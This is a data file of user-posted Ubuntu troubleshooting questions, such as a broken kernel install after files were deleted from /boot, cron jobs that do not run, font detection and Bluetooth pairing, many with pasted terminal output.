337379	after deleting some old kernel	i deleted some essential kernels parts to enlarge the free space on my boot partition . first i proceed as in this link . however the problem is not exactly the same as in the link ( see answer from eliah below ) . what i tried first was the following , first output of my partition scheme : ubuntu @ ubuntu : ~ $ sudo parted -l model : ata st3500418as ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 535mb 535mb primary ext4 boot 2 535mb 5914mb 5379mb primary linux-swap ( v1 ) 3 5914mb 106gb 100gb primary ext4 4 106gb 500gb 394gb primary ext4 model : wd 5000aac external ( scsi ) disk /dev/sdb : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 500gb 500gb primary ext4 warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! ubuntu @ ubuntu : ~ $ i have the boot partition on sda1 , sda2 is my swap partition , sda3 is my root directory and sda4 is my home partition . i followed the instruction on the second answer ( by eliah ) . this means : 1. ubuntu @ ubuntu : ~ $ sudo mount /dev/sda3 /mnt ubuntu @ ubuntu : ~ $ sudo mount -- bind /dev /mnt/dev ubuntu @ ubuntu : ~ $ sudo mount /dev/sda1 /mnt/boot then i chrooted : ubuntu @ ubuntu : ~ $ sudo chroot /mnt root @ ubuntu : / # mount -t proc none /proc root @ ubuntu : / # mount -t sysfs none /sys root @ ubuntu : / # mount -t devpts none /dev/pts root @ ubuntu : / # export home=/root root @ ubuntu : / # export lc_all=c i tried to install new kernel : apt-get update apt-get -y install linux-image-generic here i get the following error : root @ ubuntu : / # apt-get -y install linux-image-generic reading package lists ... done building dependency tree reading state information ... done linux-image-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 15 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-3.8.0-29-generic ( 3.8.0-29.42 ) ... internal error : could not find image ( /boot/vmlinuz-3.8.0-29-generic ) dpkg : error processing linux-image-3.8.0-29-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-29-generic : linux-image-extra-3.8.0-29-generic depends on linux-image-3.8.0-29-generic ; however : package linux-image-3.8.0-29-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-29-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-29-generic ; however : package linux-image-3.8.0-29-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.8.0-29-generic ; however : package linux-image-extra-3.8.0-29-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-imno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already age : linux-image depends on linux-image-generic ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-image ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.8.0-29-generic linux-image-extra-3.8.0-29-generic linux-image-generic linux-image e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ ubuntu : / # umount /proc || umount -lf /proc umount /sys /dev/pts exit sudo umount /mnt/dev /mnt i also tried to uninstall everything and run apt-get install linux-generic linux-image-generic linux-headers-generic and of course update-grub i 'm still getting the memtest while booting . as eliah pointed out , the above solution does not apply in my case . so i followed the instructions in his answer below . however this does not solve the problem . i got the following outputs : ubuntu @ ubuntu : ~ $ sudo mount /dev/sda3 /mnt ubuntu @ ubuntu : ~ $ sudo mount -- bind /dev /mnt/dev ubuntu @ ubuntu : ~ $ sudo mount /dev/sda1 /mnt/boot ubuntu @ ubuntu : ~ $ sudo chroot /mnt root @ ubuntu : / # mount -t proc none /proc root @ ubuntu : / # mount -t sysfs none /sys root @ ubuntu : / # mount -t devpts none /dev/pts root @ ubuntu : / # export home=/root root @ ubuntu : / # export lc_all=c then running apt-get update followed by the suggested : root @ ubuntu : / # apt-get -y -- purge -- reinstall install linux-image-3.8.0-29-generic linux-image-extra-3.8.0-29-generic linux-image-generic reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 3 reinstalled , 0 to remove and 0 not upgraded . need to get 0 b/43.3 mb of archives . after this operation , 0 b of additional disk space will be used . dpkg : warning : files list file for package 'linux-image-3.8.0-29-generic ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'initramfs-tools ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'linux-image-extra-3.8.0-29-generic ' missing ; assuming package has no files currently installed ( reading database ... 251414 files and directories currently installed . ) preparing to replace linux-image-3.8.0-29-generic 3.8.0-29.42 ( using ... /linux-image-3.8.0-29-generic_3.8.0-29.42_amd64.deb ) ... done . unpacking replacement linux-image-3.8.0-29-generic ... preparing to replace linux-image-extra-3.8.0-29-generic 3.8.0-29.42 ( using ... /linux-image-extra-3.8.0-29-generic_3.8.0-29.42_amd64.deb ) ... unpacking replacement linux-image-extra-3.8.0-29-generic ... preparing to replace linux-image-generic 3.8.0.29.47 ( using ... /linux-image-generic_3.8.0.29.47_amd64.deb ) ... unpacking replacement linux-image-generic ... setting up linux-image-3.8.0-29-generic ( 3.8.0-29.42 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) failed to symbolic-link /boot/initrd.img-3.8.0-29-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-3.8.0-29-generic.postinst line 614. dpkg : error processing linux-image-3.8.0-29-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-29-generic : linux-image-extra-3.8.0-29-generic depends on linux-image-3.8.0-29-generic ; however : package linux-image-3.8.0-29-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-29-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-29-generic ; however : package linux-image-3.8.0-29-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.8.0-29-generic ; however : package linux-image-extra-3.8.0-29-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-3.8.0-29-generic linux-image-extra-3.8.0-29-generic linux-image-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ ubuntu : / #
337384	how to stop a upstart job when another is starting ?	i want to stop ( and start again later ) several services manually . how can i figure out the correct sequence that respects the dependencies ? in ancient times i could parse the contents of e. g. /etc/rc2.d and follow the given sequence . how would that work with upstart ? what i need is a script : input : list of services output : this list sorted such that these services can be safely started int that order i want to backup my system ; prior to the backup i want to stop services that might lead to an inconsistent backup ( like the mail system ) , or that might have some data in memory and not on the file system ( like databases ) .
337385	libreoffice does not detects my fonts	i installed some truetype fonts in following folder : /usr/share/fonts/truetype/bfonts some softwares such as thunderbird detect my fonts and i can use them in those software 's , but libreoffice does not detect newly installed fonts . i tried restarting libreoffice and restarting ubuntu as well , but no success . any one could help me ?
337394	getting values from variables - bash script	i am trying to write a bash script to print values of the 3 variables . keep getting errors . what am i doing wrong ? input1=/tmp/dir1 input2=/tmp/dir2 input3=/tmp/dir3 for i in 1 2 3 do echo $ ( input $ i ) done when i run this script , tho output is : syntax error : operand expected ( error token is `` /tmp/dir1
337395	open python file with idle using terminal on ubuntu 12.04	how can i open python file ( from desktop ) with idle , using terminal on ubuntu 12.04 ? i have tried to do this way : $ idle open python_file.py instead of open my file it 's create two more files : open and python_file.py .
337401	can not access local variables using systemtap	i am just getting started using systemtap . on my 64bit ubuntu 13.04 system , i installed systemtap and dependencies + systemtap-doc and elfutils then added the ddep repository to my apt/sources.list and installed the dbgsym package for my kernel ( 3.8.0-29.42 ) . i then tried running the examples in /usr/share/doc/systemtap-doc/examples/general ( e.g. , key.stp ) , but i got semantic error : not accessible at this address [ man error : :dwarf ] ... identifier ' $ event_type ' at key.stp:8:7 i then ran the `` work around broken dbgsym file layount ... '' -script as described at wiki.ubuntu.com/kernel/systemtap still the same error and similar errors occur running the other scripts whenever a local variable is accessed . so i wrote a little script following section `` determine local variables at probe point '' on the same page to give me a list of local variables in kbd_event . probe begin { printf ( `` probe installed '' ) } probe kernel.function ( `` kbd_event '' ) { printf ( `` % s locals [ % s ] \n '' , probefunc ( ) , $ $ locals ) exit ( ) } which gives me probe installed kbd_event locals [ ] so it looks like stap does n't see any local variables and this is where i am stuck . any ideas what i am missing or what i could try next ? thanks ! ps : the same procedure works fine on my 64bit 12.04 with 3.2.0-49.75 kernel . update : i now even rebuild the kernel with debugging symbols using gcc 4.7 , but still no improvement .
337406	ubuntu dual monitor problem	my problem is when i start an app or something like that . app starts on the extra monitor . when i do options > display change sides with external monitor and laptop . it fixes but i want external monitor on the left , laptop is on the right . how can i fix that problem ? thanks ...
337409	problem in installing python 3.3 in ubuntu 12.04	initially i installed python 3.3 from source , but then i removed and deleted the directory /usr/lib/python3.3 . when i am installing it using aptitude , i am getting this error . unpacking python3.3 ( from ... /python3.3_3.3.1-1ubuntu5_i386.deb ) ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... setting up python3.3 ( 3.3.1-1ubuntu5 ) ... python3.3 : ca n't open file '/usr/lib/python3.3/py_compile.py ' : [ errno 2 ] no such file or directory dpkg : error processing python3.3 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : python3.3 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up python3.3 ( 3.3.1-1ubuntu5 ) ... python3.3 : ca n't open file '/usr/lib/python3.3/py_compile.py ' : [ errno 2 ] no such file or directory dpkg : error processing python3.3 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : any idea how to rectify the error ?
337411	how to permanently assign a different keyboard layout to a usb keyboard ?	i often plugin a usb keyboard to my laptop ( in addition to external monitor and mouse , which all virtually convert my laptop to a desktop computer ) and i prefer using a different keyboard layout then . i have to manually change the current keyboard layout each time i plugin this usb keyboard . and i 'd like to use an automated way for this , if possible . radu 's answer to the question here gives some clues , but it seems i 'll need a startup script for this task as the device id for my usb keyboard changes every time the computer starts . this startup script will probably first include the command xinput -list | grep `` usb keyboard '' , and another command to grab the first usb keyboard id number displayed and then use it in the final command to set my chosen layout for that usb keyboard as below : setxkbmap -device < number > -layout < layout >
337415	cron job not running	i have created a script # ! /bin/bash echo `` tredor '' if i run it using command line , it works , but when i move it to being a cron job , it does n't . in crontab -e , i entered the following code */5 * * * * root ./my_script i expect to see an output `` tredor '' every 5 minutes but that is no happening . how can i modify my codes to be able to see output ?
337416	computer lagging badly	after completely removing windows and installing ubuntu 13.04 i am experiencing extreme lag , it takes a few seconds to open apps and video playback just seems to laggy to watch , i looked up the problem and it seems to be drivers for my graphics card which is sis i have posted the output of lspci ashley @ ashley-sorrento : ~ $ lspci 00:00.0 host bridge : silicon integrated systems [ sis ] 671mx 00:01.0 pci bridge : silicon integrated systems [ sis ] agp port ( virtual pci-to-pci bridge ) 00:02.0 isa bridge : silicon integrated systems [ sis ] sis968 [ mutiol media io ] ( rev 01 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:04.0 ethernet controller : silicon integrated systems [ sis ] 191 gigabit ethernet adapter ( rev 02 ) 00:05.0 ide interface : silicon integrated systems [ sis ] sata controller / ide mode ( rev 03 ) 00:0f.0 audio device : silicon integrated systems [ sis ] azalia audio controller 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) im completely new so could someone help please output of ps ax ashley @ ashley-sorrento : ~ $ ps ax pid tty stat time command 1 ? ss 0:01 /sbin/init 2 ? s 0:00 [ kthreadd ] 3 ? s 0:00 [ ksoftirqd/0 ] 5 ? s < 0:00 [ kworker/0:0h ] 6 ? s 0:00 [ kworker/u:0 ] 7 ? s < 0:00 [ kworker/u:0h ] 8 ? s 0:00 [ migration/0 ] 9 ? s 0:00 [ rcu_bh ] 10 ? s 0:00 [ rcu_sched ] 11 ? s 0:00 [ watchdog/0 ] 12 ? s < 0:00 [ cpuset ] 13 ? s < 0:00 [ khelper ] 14 ? s 0:00 [ kdevtmpfs ] 15 ? s < 0:00 [ netns ] 16 ? s 0:00 [ bdi-default ] 17 ? s < 0:00 [ kintegrityd ] 18 ? s < 0:00 [ kblockd ] 19 ? s < 0:00 [ ata_sff ] 20 ? s 0:00 [ khubd ] 21 ? s < 0:00 [ md ] 22 ? s < 0:00 [ devfreq_wq ] 24 ? s 0:00 [ khungtaskd ] 25 ? s 0:00 [ kswapd0 ] 26 ? sn 0:00 [ ksmd ] 27 ? sn 0:00 [ khugepaged ] 28 ? s 0:00 [ fsnotify_mark ] 29 ? s 0:00 [ ecryptfs-kthrea ] 30 ? s < 0:00 [ crypto ] 41 ? s < 0:00 [ kthrotld ] 42 ? s 0:00 [ kworker/0:2 ] 45 ? s < 0:00 [ binder ] 64 ? s < 0:00 [ deferwq ] 65 ? s < 0:00 [ charger_manager ] 163 ? s 0:00 [ scsi_eh_0 ] 167 ? s 0:00 [ scsi_eh_1 ] 222 ? s 0:00 [ jbd2/sda1-8 ] 223 ? s < 0:00 [ ext4-dio-unwrit ] 294 ? s 0:00 upstart-file-bridge -- daemon 318 ? s 0:00 upstart-udev-bridge -- daemon 320 ? ss 0:00 /sbin/udevd -- daemon 418 ? s < 0:00 [ kpsmoused ] 601 ? s 0:00 upstart-socket-bridge -- daemon 630 ? s < 0:00 [ kworker/0:1h ] 633 ? s < 0:00 [ cfg80211 ] 664 ? s < 0:00 [ hd-audio0 ] 725 ? ss 0:00 dbus-daemon -- system -- fork 733 ? sl 0:00 rsyslogd -c5 749 ? ss 0:00 /usr/sbin/modem-manager 750 ? ss 0:00 /usr/sbin/bluetoothd 780 ? s < 0:00 [ krfcommd ] 808 ? s 0:00 avahi-daemon : running [ ashley-sorrento.local ] 810 ? s 0:00 avahi-daemon : chroot helper 842 ? ss 0:00 /usr/sbin/cupsd -f 856 tty4 ss+ 0:00 /sbin/getty -8 38400 tty4 860 tty5 ss+ 0:00 /sbin/getty -8 38400 tty5 865 ? ssl 0:00 networkmanager 869 tty2 ss+ 0:00 /sbin/getty -8 38400 tty2 870 tty3 ss+ 0:00 /sbin/getty -8 38400 tty3 872 tty6 ss+ 0:00 /sbin/getty -8 38400 tty6 890 ? ss 0:00 /usr/sbin/cups-browsed 899 ? ss 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket 914 ? slsl 0:00 lightdm 962 ? ss 0:00 /bin/sh -e /proc/self/fd/9 964 ? s 0:00 initctl emit plymouth-ready 969 ? ss 0:00 cron 984 ? sl 0:00 /usr/lib/policykit-1/polkitd -- no-debug 994 tty7 ss+ 0:30 /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -n 1090 ? s 0:00 [ flush-8:0 ] 1091 ? ssl 0:00 whoopsie 1102 tty1 ss+ 0:00 /sbin/getty -8 38400 tty1 1110 ? sl 0:00 /usr/lib/accountsservice/accounts-daemon 1124 ? s 0:00 [ kauditd ] 1130 ? sl 0:00 /usr/sbin/console-kit-daemon -- no-daemon 1245 ? ss 0:00 /sbin/wpa_supplicant -b -p /run/sendsigs.omit.d/wpasu 1251 ? sl 0:00 /usr/lib/upower/upowerd 1365 ? sl 0:00 /usr/lib/colord/colord 1379 ? sl 0:00 lightdm -- session-child 12 21 1414 ? s 0:00 /sbin/dhclient -d -sf /usr/lib/networkmanager/nm-dhcp 1438 ? snl 0:00 /usr/lib/rtkit/rtkit-daemon 1451 ? s 0:00 /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground -- 1641 ? sl 0:00 /usr/bin/gnome-keyring-daemon -- daemonize -- login 1652 ? ssl 0:00 gnome-session -- session=ubuntu 1697 ? ss 0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-s 1700 ? s 0:00 /usr/bin/dbus-launch -- exit-with-session /usr/bin/im- 1701 ? ss 0:00 //bin/dbus-daemon -- fork -- print-pid 5 -- print-addres 1711 ? sl 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher 1715 ? s 0:00 /bin/dbus-daemon -- config-file=/etc/at-spi2/accessibi 1718 ? sl 0:00 /usr/lib/at-spi2-core/at-spi2-registryd -- use-gnome-s 1726 ? sl 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon 1738 ? s < l 0:00 /usr/bin/pulseaudio -- start -- log-target=syslog 1744 ? sl 0:00 /usr/lib/gvfs/gvfsd 1750 ? sl 0:00 /usr/lib/gvfs//gvfsd-fuse -f /run/user/ashley/gvfs 1765 ? rl 1:24 compiz 1772 ? s 0:00 syndaemon -i 1.0 -t -k -r 1777 ? sl 0:00 /usr/lib/dconf/dconf-service 1780 ? sl 0:00 /usr/lib/gnome-settings-daemon/gnome-fallback-mount-h 1781 ? sl 0:01 nautilus -n 1782 ? sl 0:00 nm-applet 1783 ? sl 0:00 /usr/lib/policykit-1-gnome/polkit-gnome-authenticatio 1796 ? sl 0:00 /usr/lib/gvfs/gvfs-udisks2-volume-monitor 1800 ? sl 0:00 /usr/lib/udisks2/udisksd -- no-debug 1807 ? s 0:00 /usr/lib/i386-linux-gnu/gconf/gconfd-2 1812 ? sl 0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor 1816 ? sl 0:00 /usr/lib/gvfs/gvfs-mtp-volume-monitor 1820 ? sl 0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor 1839 ? sl 0:00 /usr/lib/gvfs/gvfsd-burn -- spawner :1.8 /org/gtk/gvfs 1844 ? sl 0:00 /usr/lib/gvfs/gvfsd-trash -- spawner :1.8 /org/gtk/gvf 1850 ? sl 0:00 /usr/lib/i386-linux-gnu/bamf/bamfdaemon 1857 ? sl 0:00 /usr/lib/gvfs/gvfsd-metadata 1859 ? ss 0:00 /bin/sh -c /usr/bin/gtk-window-decorator 1860 ? sl 0:00 /usr/bin/gtk-window-decorator 1864 ? sl 0:01 /usr/lib/unity/unity-panel-service 1866 ? sl 0:00 /usr/lib/i386-linux-gnu/hud/hud-service 1879 ? sl 0:00 /usr/lib/i386-linux-gnu/indicator-sound-service 1882 ? sl 0:00 /usr/lib/indicator-messages/indicator-messages-servic 1883 ? sl 0:00 /usr/lib/i386-linux-gnu/indicator-bluetooth/indicator 1885 ? sl 0:00 /usr/lib/i386-linux-gnu/indicator-sync/indicator-sync 1887 ? sl 0:00 /usr/lib/i386-linux-gnu/indicator-datetime-service 1890 ? sl 0:00 /usr/lib/i386-linux-gnu/indicator-application-service 1891 ? sl 0:00 /usr/lib/i386-linux-gnu/indicator-printers-service 1893 ? sl 0:00 /usr/lib/indicator-session/indicator-session-service 1932 ? sl 0:00 /usr/lib/evolution/evolution-source-registry 1950 ? sl 0:00 telepathy-indicator 1957 ? sl 0:00 /usr/lib/telepathy/mission-control-5 1966 ? sl 0:00 zeitgeist-datahub 1967 ? sl 0:00 gnome-screensaver 1973 ? sl 0:00 /usr/bin/zeitgeist-daemon 1982 ? sl 0:00 /usr/lib/zeitgeist/zeitgeist-fts 1989 ? s 0:00 /bin/cat 2001 ? sl 0:01 /usr/lib/i386-linux-gnu/unity-lens-applications/unity 2003 ? sl 0:00 /usr/lib/i386-linux-gnu/unity-lens-files/unity-files- 2005 ? sl 0:00 /usr/lib/i386-linux-gnu/unity-lens-friends 2007 ? sl 0:00 /usr/lib/i386-linux-gnu/unity-lens-music/unity-music- 2011 ? sl 0:00 /usr/bin/python3 /usr/lib/unity-lens-photos/unity-len 2012 ? sl 0:00 /usr/lib/i386-linux-gnu/unity-lens-video/unity-video- 2013 ? sl 0:00 /usr/lib/i386-linux-gnu/unity-lens-shopping/unity-sho 2069 ? s 0:00 sh -c /usr/lib/i386-linux-gnu/libproxy/0.4.7/pxgsetti 2070 ? sl 0:00 /usr/lib/i386-linux-gnu/libproxy/0.4.7/pxgsettings or 2075 ? sl 0:00 /usr/bin/python3 /usr/lib/unity-lens-files/unity-scop 2076 ? sl 0:00 /usr/lib/i386-linux-gnu/unity-lens-video/unity-scope- 2083 ? sl 0:00 /usr/lib/i386-linux-gnu/unity-lens-music/unity-musics 2106 ? s 0:00 sh -c /usr/lib/i386-linux-gnu/libproxy/0.4.7/pxgsetti 2107 ? sl 0:00 /usr/lib/i386-linux-gnu/libproxy/0.4.7/pxgsettings or 2129 ? s 0:00 sh -c /usr/lib/i386-linux-gnu/libproxy/0.4.7/pxgsetti 2130 ? sl 0:00 /usr/lib/i386-linux-gnu/libproxy/0.4.7/pxgsettings or 2147 ? sl 0:00 update-notifier 2159 ? s 0:00 /sbin/udevd -- daemon 2160 ? s 0:00 /sbin/udevd -- daemon 2165 ? sl 0:20 /usr/lib/firefox/firefox 2181 ? sl 0:00 /usr/lib/libunity-webapps/unity-webapps-service 2221 ? sl 0:00 /usr/lib/i386-linux-gnu/deja-dup/deja-dup-monitor 2243 ? s 0:00 [ kworker/0:1 ] 2269 ? s 0:00 [ kworker/u:2 ] 2271 ? s 0:00 [ kworker/0:0 ] 2288 ? s 0:00 [ kworker/0:3 ] 2294 ? ss 0:00 /bin/sh -c gnome-terminal 2295 ? sl 0:00 gnome-terminal 2301 ? s 0:00 gnome-pty-helper 2303 pts/0 ss 0:00 bash 2352 pts/0 r+ 0:00 ps ax output of service -- status-all ashley @ ashley-sorrento : ~ $ service -- status-all [ ? ] acpi-support [ ? ] acpid [ ? ] alsa-restore [ ? ] alsa-store [ ? ] anacron [ - ] apparmor [ ? ] apport [ ? ] avahi-cups-reload [ ? ] avahi-daemon [ ? ] bluetooth [ - ] bootlogd [ - ] brltty [ ? ] console-font [ ? ] console-setup [ ? ] cron [ ? ] cups [ ? ] cups-browsed [ ? ] dbus [ ? ] dmesg [ ? ] dns-clean [ ? ] failsafe-x [ ? ] friendly-recovery [ - ] grub-common [ ? ] hostname [ ? ] hwclock [ ? ] hwclock-save [ ? ] irqbalance [ - ] kerneloops [ ? ] killprocs [ ? ] kmod [ ? ] lightdm [ ? ] modemmanager [ ? ] network-interface [ ? ] network-interface-container [ ? ] network-interface-security [ ? ] network-manager [ ? ] networking [ ? ] networking.dpkg-new [ ? ] ondemand [ ? ] plymouth [ ? ] plymouth-log [ ? ] plymouth-ready [ ? ] plymouth-splash [ ? ] plymouth-stop [ ? ] plymouth-upstart-bridge [ ? ] pppd-dns [ ? ] procps [ ? ] pulseaudio [ ? ] rc.local [ ? ] resolvconf [ ? ] rfkill-restore [ ? ] rfkill-store [ - ] rsync [ ? ] rsyslog [ + ] saned [ ? ] sendsigs [ ? ] setvtrgb [ ? ] speech-dispatcher [ - ] stop-bootlogd [ - ] stop-bootlogd-single [ - ] sudo [ ? ] udev [ ? ] udev-fallback-graphics [ ? ] udev-finish [ ? ] udevmonitor [ ? ] udevtrigger [ ? ] ufw [ ? ] umountfs [ ? ] umountnfs.sh [ ? ] umountroot [ - ] unattended-upgrades [ - ] urandom [ ? ] whoopsie [ - ] x11-common
337419	what is changelog.debian.gz file during packaging ?	while packaging i encountered following error dh_builddeb dpkg-deb : building package `remotedevicecontroller ' in `../remotedevicecontroller_1.0-1_i386.deb ' . dpkg-source -b remotedevicecontroller-1.0 dpkg-source : info : using source format `3.0 ( quilt ) ' dpkg-source : error : unwanted binary file : debian/remotedevicecontroller/usr/share/doc/remotedevicecontroller/changelog.debian.gz dpkg-source : error : detected 1 unwanted binary file ( add it in debian/source/include-binaries to allow its inclusion ) . dpkg-buildpackage : error : dpkg-source -b remotedevicecontroller-1.0 gave error exit status 29 why is the file being created by debian-helper and why is it again asking to include it in some other directory ?
337423	jbl charge re-connection problem bluetooth	i have recently bought a jbl charge bluetooth/portable speaker . now i am very very happy with this device , it is awesome , i do have a problem with it too . at first pairing all goes well , i go through the pairing sequence and behold : it works ! but then the next time you turn it on , the blue led starts blinking , it beeps and then the blue led comes on full time , which should mean it is connected , but it 's not . it does not show up in sound settings as an option . the only way i can get it to work with ubuntu is to : a ) remove the jbl charge in bluetooth settings completely . b ) go through the pairing sequence ... anybody got any tips on settings and files that control this behaviour ? it would be nice to have it working every time i turn it on . thanks !
337425	can we get xenserver vms provisioned by maas ?	currently i am using kvm , and kvm vms can be managed by maas but i am wondering , is it possible that xenserver vms will also work ?
337429	catalyst control center ( administrative ) prompts for password , then wo n't open ?	i have a fresh ( non-wubi ) ubuntu 13.04 x64 install , with successfully installed amd radeon hd 7870 drivers that were obtained by software & updates > additional drivers > amd graphics accelerators from fglrx-updates ( proprietary ) . i rebooted after installing these drivers and my system was running 100 times better . i also noticed that i had the catalyst control center all of the sudden , so i went to configure my ( 2 ) displays there . but when i try to open ccc as admin , a terminal-like window appears , and asks for my password . i enter the correct password , then i see a quick flash that says : 'su : authentication failed ' ( i think ... ) . i searched online for a resolution and found an old thread from ubuntu 11.xx and then opened a terminal , typed sudo amdcccle . this opened the program just fine . i got my monitors configured nicely ... the problem still persists however ! so ! what i am trying to figure out is : how do i correct the failed password authentication that occurs when i attempt to launch the program via unity bar ?
337439	how do i install oracle database 12c ?	i downloaded oracle database 12c but i 'm having trouble installing it . can anyone help me ? imported from the comments below : then i unzipped it and installed it , but nothing appears the installation finishes and says it was a success but nda happens . it is as if i had not installed anything . during installation appeared some messages saying that the environment does not meet all the requirements , but the installation was to the end .
337441	using windows exported `` .rdp '' file from ubuntu	i got this `` .rdp '' remoteapp file from work which enables me to run a specific application from the terminal server , i can open it easily using windows with a double click , are there any ways to open this kind of files from ubuntu ?
337442	problem syncing outlook mail on thunderbird	i have been using aliases on my outlook mail . it usually are in the form of folders , where the mails directed to alias email ids would go . while syncing my account on thunderbird ( ubuntu 12.10 lts / thunderbird 17.0.2 ) , these folders does n't show up . the inbox also does n't sync up properly . but my google accounts works perfectly fine . any solutions / alternatives ?
337443	what is a full path name ?	i would like to understand what full path name really means . i have a file in my home directory called my_script . i assumed the full path name is ./my_script , meaning that it is in the root folder , but i am not sure . can someone please enlighten me on that ?
337444	how to increase the priority for a task permanently in linux machine ?	how to increase the priority for a task in linux machine ? what i 've done so far : after small research i found that we can increase the priority to a task using nice command and if we want to increase the priority for an existing task , then we can also use renice command but my problem : in some tutorials its mentioned that , nice values vary from 0 to 99 , but in some tutorials states that nice values vary from -20 to 19 . which one is correct ? how to increase the nice value for an gui task ? if we are doing copy using terminal then i can increase its priority using nice command but how to increase the priority of a task done using gui ( for ex : copying files from usb to system through gui ) is that possible to set the priority of a task for the life time ? i want to set highest priority for `` copying files in system ( using gui ) permanently is there anyone who can help me to set the highest priority for a task ( task done through gui ) ?
337454	why i am being taken to windows 7 and ca n't boot into ubuntu 13.04 after installation ?	after finished installation i am not able to boot in to ubuntu , i tried to use the boot-repair software , but i got no luck with the recommended repair . so , as instructed , i type here the url returned by the boot-repair program : http : //paste.ubuntu.com/6028654/
337456	/boot 100 % and ca n't purge	running ubuntu 12.04 ls and it tells me that it ca n't complete install on linux-image-3.5.39 because of dependencies . running 'apt-get -f install ' does n't do anything . how can i remove anything from `` /boot '' . it does n't let me install anything , so i got to work with the packages i got . uname -r -- > linux 28. suggestions are very much appreaciated installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 291331 files and directories currently installed . ) unpacking linux-image-3.5.0-39-generic ( from ... /linux-image-3.5.0-39-generic_3.5.0-39.60~precise1_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-39-generic_3.5.0-39.60~precise1_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.5.0-39-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-39-generic /boot/vmlinuz-3.5.0-39-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-39-generic /boot/vmlinuz-3.5.0-39-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-39-generic_3.5.0-39.60~precise1_amd64.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) dpkg : dependency problems prevent configuration of linux-image-generic-lts-quantal : linux-image-generic-lts-quantal depends on linux-image-3.5.0-39-generic ; however : package linux-image-3.5.0-39-generic is not installed . dpkg : error processing linux-image-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-lts-quantal : linux-generic-lts-quantal depends on linux-image-generic-lts-quantal ; however : package linux-image-generic-lts-quantal is not configured yet . dpkg : error processing linux-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-37-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for 